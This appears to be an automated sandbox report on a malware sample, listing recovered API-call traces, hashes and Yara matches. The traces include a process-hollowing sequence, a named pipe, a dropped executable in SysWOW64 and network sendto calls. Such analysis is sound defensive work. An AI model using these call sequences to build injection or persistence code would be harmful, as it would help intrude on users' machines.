• Instruction ID: 6e2e44892aba79e0faa5dfc7f889ef1b39e8059119c3b01d3d2255e71ac78bb2
• Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
• Instruction Fuzzy Hash: 6B215E71901629ABCB219F65DC48AAEFBB8EF08B50F104461F905E7240E7B89E81D7E4
APIs
• GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
• GetProcAddress.KERNEL32(00000000), ref: 00406CEE
• GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
• GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Directory$AddressHandleModuleProcSystemWindows
• String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
• API String ID: 1082366364-3395550214
• Opcode ID: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
• Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
• Opcode Fuzzy Hash: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
• Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
APIs
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02D79A18
• GetThreadContext.KERNEL32(?,?), ref: 02D79A52
• TerminateProcess.KERNEL32(?,00000000), ref: 02D79A60
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02D79A98
• SetThreadContext.KERNEL32(?,00010002), ref: 02D79AB5
• ResumeThread.KERNEL32(?), ref: 02D79AC2
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Similarity
• API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
• String ID: D
• API String ID: 2981417381-2746444292
• Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
• Instruction ID: 37bf9c6e07786be4f9647112959d222b6e332a51f01c15f5fd6d290d1f34355b
• Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
• Instruction Fuzzy Hash: 00213D72902219BBDB11DBA1DC09EEF7BBCEF05750F404061BA19E5150F7758A44CBA4
APIs
• inet_addr.WS2_32(004102D8), ref: 02D71C18
• LoadLibraryA.KERNEL32(004102C8), ref: 02D71C26
• GetProcessHeap.KERNEL32 ref: 02D71C84
• RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 02D71C9D
• RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 02D71CC1
• HeapFree.KERNEL32(?,00000000,00000000), ref: 02D71D02
• FreeLibrary.KERNEL32(?), ref: 02D71D0B
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Similarity
• API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
• String ID:
• API String ID: 2324436984-0
• Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
• Instruction ID: 14b6787d71960f9e02af9a6b42ed8cdad0d189e2c1c240fcc0e2af4277dca92c
• Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
• Instruction Fuzzy Hash: FD314F32D00219BFCB119FE4DC889FEBBB9EB45715B24457AE505A2210E7B98E80DB94
APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02D76CE4
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02D76D22
• GetLastError.KERNEL32 ref: 02D76DA7
• CloseHandle.KERNEL32(?), ref: 02D76DB5
• GetLastError.KERNEL32 ref: 02D76DD6
• DeleteFileA.KERNEL32(?), ref: 02D76DE7
• GetLastError.KERNEL32 ref: 02D76DFD
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Similarity
• API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
• String ID:
• API String ID: 3873183294-0
• Opcode ID: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
• Instruction ID: 6e230930f357d880c8bd69307e9d0933cb11d1e4742218acc4d598edea20a12f
• Opcode Fuzzy Hash: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
• Instruction Fuzzy Hash: 1731CE76900649BFCB019FA49D48ADEBF7DEB48310F148065E251A3350F774CA95CBA1
APIs
• GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\kosqarwi,02D77043), ref: 02D76F4E
• GetProcAddress.KERNEL32(00000000), ref: 02D76F55
• GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02D76F7B
• GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02D76F92
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Similarity
• API ID: Directory$AddressHandleModuleProcSystemWindows
• String ID: C:\Windows\SysWOW64\$\\.\pipe\kosqarwi
• API String ID: 1082366364-2431561582
• Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
• Instruction ID: 12b1257702d5e4e70185255e68eabb091982102b42f08e80b042f0f6072c48f6
• Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
• Instruction Fuzzy Hash: 7121BE217413407EF72253359C88FAB6A5C8B52724F2840A5F944A66D0FBDD8896C2BD
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Similarity
• API ID: lstrlen
• String ID: $localcfg
• API String ID: 1659193697-2018645984
• Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
• Instruction ID: b1dd999890676c2b8dc623990288034b0d7d3946b162ae97b2982431e4f06fad
• Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
• Instruction Fuzzy Hash: 05711572A04318BADF318B54DC85BEE376AEB00719F244067F904A6390FF6E9D84CB65
APIs
  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
  • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000), ref: 0040DDB5
• lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
• lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
• lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
• lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
• String ID: flags_upd$localcfg
• API String ID: 204374128-3505511081
• Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
• Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
• Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
• Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
APIs
  • Part of subcall function 02D7DF6C: GetCurrentThreadId.KERNEL32 ref: 02D7DFBA
• lstrcmp.KERNEL32(00410178,00000000), ref: 02D7E8FA
• lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,02D76128), ref: 02D7E950
• lstrcmp.KERNEL32(?,00000008), ref: 02D7E989
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Similarity
• API ID: lstrcmp$CurrentThreadlstrcpyn
• String ID: A$ A$ A
• API String ID: 2920362961-1846390581
• Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
• Instruction ID: 3822b82cf05dafa36eddff9b25dc09871f150faed07e03a27e62ec472384e611
• Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
• Instruction Fuzzy Hash: B631BC32A007069BCB71CF24C884BA67BE8EF05324F5089AAE59587750F378EC80CB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Code
                                                                                        • String ID:
                                                                                        • API String ID: 3609698214-0
                                                                                        • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                        • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                        • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                        • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Code
                                                                                        • String ID:
                                                                                        • API String ID: 3609698214-0
                                                                                        • Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                        • Instruction ID: 6ff93602cee4b69462429362f79409f50434224adad5fc503416e7a7be49b98e
                                                                                        • Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                        • Instruction Fuzzy Hash: 6E214A72204619BFDB119BA0EC48EDF3FADEB49264B108465F502D1190FB78DE40DAB4
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                        • wsprintfA.USER32 ref: 004090E9
                                                                                        • CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                        • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2439722600-0
                                                                                        • Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                        • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                        • Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                        • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000400,?), ref: 02D792E2
                                                                                        • wsprintfA.USER32 ref: 02D79350
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02D79375
                                                                                        • lstrlen.KERNEL32(?,?,00000000), ref: 02D79389
                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 02D79394
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02D7939B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2439722600-0
                                                                                        • Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                        • Instruction ID: 335f1503cbce858f8bc7a9f44c9411c4f855766901c2b2bacf221a1e92366bf9
                                                                                        • Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                        • Instruction Fuzzy Hash: 071172B26401147BE7206B31EC0DFEF7A6EDBC8B10F008065BB09E5190FAB84E418A74
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                        • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                        • Sleep.KERNEL32(00000000,?,75920F10,?,00000000,0040E538,?,75920F10,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                        • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 3819781495-0
                                                                                        • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                        • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                        • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                        • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 02D7C6B4
                                                                                        • InterlockedIncrement.KERNEL32(02D7C74B), ref: 02D7C715
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,02D7C747), ref: 02D7C728
                                                                                        • CloseHandle.KERNEL32(00000000,?,02D7C747,00413588,02D78A77), ref: 02D7C733
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1026198776-1857712256
                                                                                        • Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                        • Instruction ID: 8b9d04fc958d3c21103344d89b1652f90c6379ec96878616a1972519f081f282
                                                                                        • Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                        • Instruction Fuzzy Hash: 38514AB1A11B418FD7248F29C5D462ABBE9FB48304B50593FE18BC7BA0E778E840CB10
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 0040815F
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 00408187
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 004081BE
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 00408210
                                                                                          • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 0040677E
                                                                                          • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 0040679A
                                                                                          • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 004067B0
                                                                                          • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 004067BF
                                                                                          • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 004067D3
                                                                                          • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,75920F10,00000000), ref: 00406807
                                                                                          • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040681F
                                                                                          • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 0040683E
                                                                                          • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040685C
                                                                                          • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                          • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
                                                                                        • API String ID: 124786226-2650950432
                                                                                        • Opcode ID: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
                                                                                        • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                        • Opcode Fuzzy Hash: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
                                                                                        • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02D771E1
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02D77228
                                                                                        • LocalFree.KERNEL32(?,?,?), ref: 02D77286
                                                                                        • wsprintfA.USER32 ref: 02D7729D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountFreeLocalLookupUserwsprintf
                                                                                        • String ID: |
                                                                                        • API String ID: 2539190677-2343686810
                                                                                        • Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                        • Instruction ID: af79726d4169f36effdbd8b38323f2df75d5be2d68d60aadfc4797ef6956df1f
                                                                                        • Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                        • Instruction Fuzzy Hash: AC310A72900208BFDB11DFA4DC45BDA7BA8EF04314F14C066F959DB210EB79DA48CBA4
                                                                                        APIs
                                                                                        • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                        • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$gethostnamelstrcpy
                                                                                        • String ID: LocalHost
                                                                                        • API String ID: 3695455745-3154191806
                                                                                        • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                        • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                        • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                        • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,004122F8), ref: 0040E3E6
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                        • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1586453840-0
                                                                                        • Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                        • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                        • Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                        • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 02D7B51A
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 02D7B529
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 02D7B548
                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 02D7B590
                                                                                        • wsprintfA.USER32 ref: 02D7B61E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$File$Local$InformationSystemZonewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 4026320513-0
                                                                                        • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction ID: 6e8e3df55bd1d04077723822a3f1dcd53f9b1c3fd0b04ae86ff693133c4daf5b
                                                                                        • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction Fuzzy Hash: 0051FEB1D0021DAACF14DFD5D8885EEBBB9AF48304F10856BE505A6250E7B84AC9CF98
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
                                                                                        • LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
                                                                                        • GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
                                                                                        • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Read$AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2438460464-0
                                                                                        • Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                        • Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
                                                                                        • Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                        • Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
                                                                                        APIs
                                                                                        • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 02D76303
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02D7632A
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 02D763B1
                                                                                        • IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 02D76405
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: HugeRead$AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 3498078134-0
                                                                                        • Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                        • Instruction ID: efb44f1a28a4001c391c36183f299c8b19ee6531ff795df913919b1d62204326
                                                                                        • Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                        • Instruction Fuzzy Hash: 1E414C71A04A05EBDB14CF58C884BA9B7B9EF04358F188179E9A5D7390F779ED40CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                        • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                        • Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                        • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                        APIs
                                                                                          • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                          • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                          • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                        • lstrcmpA.KERNEL32(75920F18,00000000,?,75920F10,00000000,?,00405EC1), ref: 0040E693
                                                                                        • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,75920F10,00000000,?,00405EC1), ref: 0040E6E9
                                                                                        • lstrcmpA.KERNEL32(?,00000008,?,75920F10,00000000,?,00405EC1), ref: 0040E722
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                        • String ID: A$ A
                                                                                        • API String ID: 3343386518-686259309
                                                                                        • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                        • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                        • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                        • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040272E
                                                                                        • htons.WS2_32(00000001), ref: 00402752
                                                                                        • htons.WS2_32(0000000F), ref: 004027D5
                                                                                        • htons.WS2_32(00000001), ref: 004027E3
                                                                                        • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
